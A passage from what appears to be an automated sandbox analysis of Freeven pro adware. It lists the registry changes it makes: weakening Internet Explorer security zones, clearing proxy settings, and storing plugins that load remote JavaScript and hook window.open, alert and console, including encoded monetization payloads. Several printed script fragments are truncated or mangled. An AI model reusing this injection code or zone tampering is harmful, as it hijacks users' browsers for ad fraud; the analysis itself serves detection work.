[HKCU\Software\Freeven pro\Plugins\242]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/242.js"
[HKCU\Software\Freeven pro\Plugins\376]
"Version" = "3"0>10?0>0?0:>
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm deletes the following registry key(s):
[HKCU\Software\Freeven pro\Plugins\177]
[HKCU\Software\Freeven pro\Plugins\184]
[HKCU\Software\Freeven pro\Plugins\4]
[HKCU\Software\Freeven pro\Plugins\191]
[HKCU\Software\Freeven pro\Plugins\37]
[HKCU\Software\Freeven pro\Plugins\36]
[HKCU\Software\Freeven pro\Plugins\35]
[HKCU\Software\Freeven pro\Plugins\13]
[HKCU\Software\Freeven pro\Plugins\38]
[HKCU\Software\Freeven pro\Plugins\14]
[HKCU\Software\Freeven pro\Plugins\17]
[HKCU\Software\Freeven pro\Plugins\91]
[HKCU\Software\Freeven pro\Plugins\93]
[HKCU\Software\Freeven pro\Plugins\207]
[HKCU\Software\Freeven pro\Plugins\78]
[HKCU\Software\Freeven pro\Plugins\72]
[HKCU\Software\Freeven pro\Plugins\94]
[HKCU\Software\Freeven pro\Plugins\64]
[HKCU\Software\Freeven pro\Plugins\223]
[HKCU\Software\Freeven pro\Plugins\244]
[HKCU\Software\Freeven pro\Plugins\246]
[HKCU\Software\Freeven pro\Plugins\242]
[HKCU\Software\Freeven pro\Plugins\182]
[HKCU\Software\Freeven pro\Plugins\183]
[HKCU\Software\Freeven pro\Plugins\1]
[HKCU\Software\Freeven pro\Plugins\3]
[HKCU\Software\Freeven pro\Plugins\2]
[HKCU\Software\Freeven pro\Plugins\21]
[HKCU\Software\Freeven pro\Plugins\22]
[HKCU\Software\Freeven pro\Plugins]
[HKCU\Software\Freeven pro\Plugins\28]
[HKCU\Software\Freeven pro\Plugins\47]
[HKCU\Software\Freeven pro\Plugins\102]
[HKCU\Software\Freeven pro\Plugins\103]
[HKCU\Software\Freeven pro\Plugins\104]
[HKCU\Software\Freeven pro\Plugins\42]
[HKCU\Software\Freeven pro\Plugins\43]
[HKCU\Software\Freeven pro\Plugins\40]
[HKCU\Software\Freeven pro\Plugins\41]
[HKCU\Software\Freeven pro\Plugins\46]
[HKCU\Software\Freeven pro\Plugins\39]
[HKCU\Software\Freeven pro\Plugins\44]
[HKCU\Software\Freeven pro\Plugins\45]
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Freeven pro-codedownloader.exe:720 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Freeven pro\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\Freeven pro\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se5"
[HKCU\Software\Freeven pro\Installer]
"srcid" = "001360"
[HKCU\Software\Freeven pro\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\Freeven pro\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Freeven pro\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\Freeven pro\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\Freeven pro\Plugins\78]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderInfo.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Freeven pro\Plugins\14]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderUtils.js"
[HKCU\Software\Freeven pro\Plugins\182]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\40]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\102]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/dealply_m.js"
[HKCU\Software\Freeven pro\Plugins\183]
"URL" = "http://js.clientstaticserv.com/plugins/mins/tabsWrapper.js"
[HKCU\Software\Freeven pro\Manifest]
"Manifest" = "NA"
[HKCU\Software\Freeven pro\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi5"
[HKCU\Software\Freeven pro\Plugins\47]
"Version" = "3"
[HKCU\Software\Freeven pro\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\Freeven pro\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\Freeven pro\Plugins\37]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\39]
"Version" = "5"
[HKCU\Software\Freeven pro\Manifest]
"PublisherName" = "Freeven"
[HKCU\Software\Freeven pro\Plugins\21]
"Version" = "5"
[HKCU\Software\Freeven pro\Installer]
"Params" = "{ source_id : 001360, sub_id : 0, uzid : 0"
[HKCU\Software\Freeven pro\Plugins\45]
"Version" = "4"
[HKCU\Software\Crossrider]
"Verifier" = "283fbbb93af62851d4ee04659eadac21"
[HKCU\Software\Freeven pro\Plugins\1]
"Version" = "10"
[HKCU\Software\Freeven pro\Plugins\104]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se5"
[HKCU\Software\Freeven pro\Plugins\244]
"Version" = "2"
[HKCU\Software\Freeven pro\Manifest]
"Version" = "22"
"Description" = "Feven Shopping Companion"
[HKCU\Software\Freeven pro\Plugins\14]
"Version" = "11"
[HKCU\Software\Freeven pro\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\Freeven pro\Plugins\207]
"URL" = "http://js.clientstaticserv.com/plugins/mins/dbWrapper.js"
[HKCU\Software\Freeven pro\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\Freeven pro]
"ActiveAppId" = "54248"
[HKCU\Software\Freeven pro\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Freeven pro\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n5"
[HKCU\Software\Freeven pro\Plugins\64]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\41]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInfo.js"
[HKCU\Software\Freeven pro\Plugins\207]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve5"
[HKCU\Software\Freeven pro\Manifest]
"RunInFrame" = "false"
"ChangePrevious" = "false"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Freeven pro\Plugins\45]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEOnRequest.js"
[HKCU\Software\Freeven pro\Plugins\94]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEPopup.js"
[HKCU\Software\Freeven pro\Plugins\244]
"Name" = "engageya_inner_m"
[HKCU\Software\Freeven pro\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\Freeven pro\Manifest]
"EnableSearchIE" = "false"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Freeven pro\Plugins\17]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\177]
"URL" = "http://js.clientstaticserv.com/plugins/mins/crossriderDashboard.js"
[HKCU\Software\Freeven pro\Plugins\78]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\246]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/setup.js"
[HKCU\Software\Freeven pro\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(c){(new Function(c)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(c){if(typeof c.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:c.tabId},{channel:__tabsReloadTab__});},c.delay);}else{appAPI.message.toAllTabs({tabId:c.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(c){appAPI.message.toAllTabs(c,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(c){if(typeof c!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(d){c(d);});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=function(){try{var f=null;var c=document?document.getElementsByTagName(link):null;if(c){for(var d=0;d
[HKCU\Software\Freeven pro\Plugins\4]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Freeven pro\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Freeven pro\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\Freeven pro\Plugins\72]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiValidation.js"
[HKCU\Software\Freeven pro\Plugins\13]
"Version" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Freeven pro\Manifest]
"homepageurl" = "NA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Freeven pro\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,93,102,103,104,184,191,223,242,244,177,91,28"
[HKCU\Software\Freeven pro\Plugins\103]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[103] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(103, [intext])){ return; } var subId = appAPI.internal.monetization.getSubId(); subId = subId.substr(0,7) 00000000000; var _GPL_loader = { vars: {}, ivars: {}, proto: appAPI.dom.isHttps() ? https:// : http://, baseCDN: cdncache1-a.akamaihd.net, init: function() { var a = ; $jquery.each(this.vars, function(b, c) { a = b = c &"
[HKCU\Software\Freeven pro\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Freeven pro\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\Freeven pro\Plugins\91]
"Version" = "46"
[HKLM\SOFTWARE\Freeven pro\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\Freeven pro\Installer]
"zdata" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Freeven pro\Installer]
"osName" = "XP32"
[HKCU\Software\Freeven pro\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Freeven pro\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\Freeven pro\Plugins\36]
"Version" = "8"
[HKCU\Software\Freeven pro\Plugins\191]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ciuvo_m.js"
[HKCU\Software\Freeven pro\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Freeven pro\Plugins\191]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3MjZhNGQxMjE4MDUxNjNmMGEwNjVhNTk0ZjU4MDQwNTEyMWE0MjQ1NTcxMDFiMWIxODE4MDU0NDFiMDMwZDE1MDA1NDBmMWUwYjQ1MTUwZjFjMGEwZTU1MWYxNTBkNDUwODE4MTEwMDBhMDkxYzEwMTQxODE3MWQ1NTUyNDE0ZTQyMWMwZjA0NTYwMDBiNDE0MzcwNjU1MzBlMWUwYzFhMGIzNjFkMTY0ZTRiNDY0ODEwMWUwYzEzMWM0MDQzNWUxNTBmMWIxZjBhMDY0MTE5MDUwNDEwMDU1NjA5MTcwZTQwMTcwOTE1MGYwYjU3MTkxYzA4NDAwYTFlMTgwNTBmMGIxYTE5MTExZDE1MWI1YzU3NDQ0YzQ0MTUwYTAxNTQwNjAyNDQ0NjcyNjM1YTEzMDMwZjBiMTgwODIzMWM0ODQyNDM1ZTQzNWQ1ZDZjNGE1ODRhNTg0MTE5MWYxZTA1MGYwOTE5MDY1YTU5NGYyMTRlMDIwZTA1MDgxYTExMGQwODU4MzE1ZDZjNGE1ODRhNTg0MTA2MTQwMDE4MDgwZjMyMzk1YTU5NGY1ODA1MTc0NjQyMGMxMzA4MDYwMDFjNGMwNjBmMDQxYzA1MGY0ZDMwMTkwNTA0MTAwNTA4MTgxZDA1MWM1YTUxNGM1YjRhNWYxZjE2MDcwYTFjMDUxZjAzMGU1ZjQzNTgxNDA2MTQwODFlMTE0NDI3MDkxMTE2MTkxNTFjMDMwMzBjMGI0YTQ1NDMxNDA3NTc1MTQ2MWQxMTA0MWMwYzE4NTQzMzEyMGYxZjBlMDUwODExMGExYzFmNWYxNjE4MTEwOTFkMTAxZjFiMWUwMzA5MWQ1ODU3NTgxODQ4MTkwZDFjMTYwYjExMGQxNjQ0NTU1YTRiMTIxNDA1MGIxOTBhMGEwYjFmMWUyZTM5MjkyYTI1MmIzMDNkMzMyODM0MzQzNTJiM2YzYTNjMjYzZTMzMmU65"
[HKCU\Software\Freeven pro\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\Freeven pro\Manifest]
"BgVersion" = "1"
[HKCU\Software\Freeven pro\Installer]
"ErrorsDomain" = "http://errors.clientstaticserv.com"
[HKCU\Software\Freeven pro\Plugins\36]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBackground.js"
[HKCU\Software\Freeven pro\Plugins\1]
"URL" = "http://js.clientstaticserv.com/plugins/mins/base.js"
[HKCU\Software\Freeven pro\Plugins\47]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources_background.js"
[HKCU\Software\Freeven pro\Installer]
"FullVersion" = "1.34.5.4"
[HKCU\Software\Freeven pro\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\Freeven pro\Plugins\28]
"URL" = "http://js.clientstaticserv.com/plugins/mins/initializer.js"
[HKCU\Software\Freeven pro\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars5"
[HKCU\Software\Freeven pro\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKCU\Software\Freeven pro\Plugins\42]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\4]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\41]
"Version" = "7"
[HKCU\Software\Freeven pro\Plugins\191]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\103]
"Version" = "8"
[HKCU\Software\Freeven pro\Plugins\22]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\46]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IETimers.js"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 73 70 00 7B 22 24 9A 53 63 90 29 58 F2 CB D2"
[HKCU\Software\Freeven pro\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\Freeven pro\Plugins\244]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/engageya_inner_m.js"
[HKCU\Software\Freeven pro\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\Freeven pro\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,184,191,223,242,244,91"
[HKCU\Software\Freeven pro\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3ZjYxNDcxZDFjMTEwMTNiMGExZjU3NTI0NTU3MDAxMTA1MWU0MjVjNWEwMTBiMDYxYzRiMDIwNjE3MDMwNTAxMGIxMjA5MTExNDQwMTExZDEzMDc0YTFmMWI0YTAyMDkyNzExMTI0NjBmMDY1NzI0MzcyODMxM2YzYzI5MzEzMDM3MmMzNTUzMWIwMTA2MWEwMTA3NGUzNjI0MmMyNzM3M2MzYjMxMjcyMTI3MjQzYTNkMjEyYTIxMjE0ODM3M2EzMjNjMzcyMDI2M2EyYzMxMmQzNzJlM2QyZDMxMmEyMTIxMmEzNzQzMzMzYzM5M2QzMTM3MjEzYzNiMzUzZDJmMjEyYzNiMjkyODMwNTUzYTJlMmQyYTNjMjYzYjM3M2MyYzIwMjMzMTM5MjMyNTM3MmIzNDI1MjAyZTMxNWE1ZjdmNjE0NzFkMWMxMTAxMWQyZDAxMTk0YTVmNTU0YTBkMDUxYTA4MDA0ZjQ3NGExYzA2MTYwNTQwMGIxYjFhMTgxNTFjMDYwMjEwMWExZDVkMWMwNjAzMWE0NzBmMDI0MTBiMTQyYTBhMDI1YjAyMTY0ZTJmM2UzNTNjMjQyYzM0M2MyMDJlMjczYzRlMTYxYTE2MDcwYzE3NTczZDJkMzEyYTJjMmMyNjNjMzczODJjMmQyNzMwM2EzYTNjMmM1ODJlMzEzYjIxM2EzYjM2MjcyMTIxMzQzYzI3MjAyMDJhM2EzYzJjM2EyZTQ4M2EyMTM0MjYyMTJhMmMyYzIyM2UzNDMyMmMzNzJiMzQyNTIwNGMzMTI3MzAyNzI3MzYyNjNhMmMzNTJiMmEyYzM0MzgzNTJhMjYyNDNjMmIyNzJjNTc0NDZmN2M0YTE1MWQxYjFmMWExYjIxMDE1NzUyNDU0MzVhNGE1ZjdmNDg0NTU1NDg0NzA3MGIwYTA3MWMwYjA0MTk0YTVmNTEzNTVhMDAxZDA3MTUwNTAxMGIF5"
[HKCU\Software\Freeven pro\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\Freeven pro\Plugins\21]
"Name" = "debug"
[HKCU\Software\Freeven pro\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI3YjZmNTMwMTAyMDMwYTNkMDAwNTUzNWM1MTRiMWUwMzBlMTg0ODQ2NWUwODAxMWE1ODE5MTUxODAwMDYxMzBhMTQwNDA2MDcxOTQ2MTEwNjFjNDkxZjE5MDUxNTU1MDQxZDBlMTgwNTVmMDMwNTQ4MzUxYTFiMGUxODA4MzgwZDRiMzI0MjI5NDYyODQzNTUzMDQ0MzQ0NzQ5NWM1ZjJjNDM1NzQwNDQzNzRlM2I1ODVmNTk0MTU3NDQ1ODQxMzM0YjU4MzQ1ZjM0NDAyMjAwMDIxMjMzMGM0ZjNhMTAwYTE0MWE1MDI3MWIxYTA2MDcxNDE0MzgyZDRiNDU0YTU4NDI1OTU3MzYwMzA2MTIwMjE5MWMzYzA4MWMwMzRjMzYyOTM0MjgyNzIxM2EyMzJmMzUyYzI0MjgzYjM4MjIzNjNmMjczYzJjMjkyODVjM2MxZDA2MWQwNDEwMWIzZjEzNDczNzJkMmEyMzI5MjIzYTI0M2UzZTJkMjAzNjIyMzMzMzM2M2YzMzI1Mzc1MDQ1N2I2ZjUzMDEwMjAzMGExYjI3MWIxZDQ0NGI0OTU0MWYwZTFjMDIxYTRiNDk1ZTA3MDYwNDU0MDYxZDE5MDMwOTEzMDUxMzFhMGExODExNDcxMjA5MWM0NjE4MDcwOTBhNWQwNTFlMDExODBhNTgxZDA5NTczZDFiMTgwMTE4MDczZjEzNDcyZDRhMjg0NTI3NDM1YTM3NWEzODU4NDE1ZDVjMjM0MzU4NDc1YTNiNTEzMzU5NWM1NjQxNTg0MzQ2NGQyYzQzNTkzNzUwMzQ0ZjI1MWUwZTBkM2IwZDRjMzUxMDA1MTMwNDVjMzgxMzFiMDUwODE0MWIzZjMzNDc1YTQyNTk0MTU2NTczOTA0M